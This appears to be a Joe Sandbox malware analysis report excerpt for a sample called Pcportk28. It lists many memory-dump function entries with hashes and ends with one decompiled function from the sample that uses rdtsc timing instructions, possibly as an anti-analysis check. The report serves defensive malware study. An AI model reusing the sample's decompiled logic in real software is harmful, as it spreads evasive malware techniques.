                                                Uniqueness Score: -1.00%

                                                Function 008500C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00850048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00850078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008507AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004088D0, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 66%
                                                			E004088D0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_push( &_v24);
					_push(_t52); // executed
					_t34 = E004070E0(_t39); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}




















                                                0x004088db
                                                0x004088e3
                                                0x004088e5
                                                0x004088ea
                                                0x004088ef
                                                0x00408902
                                                0x00408907
                                                0x00408910
                                                0x0040891c
                                                0x0040892f
                                                0x00408934
                                                0x00408937
                                                0x00408940
                                                0x00408952
                                                0x00408957
                                                0x0040895c
                                                0x00000000
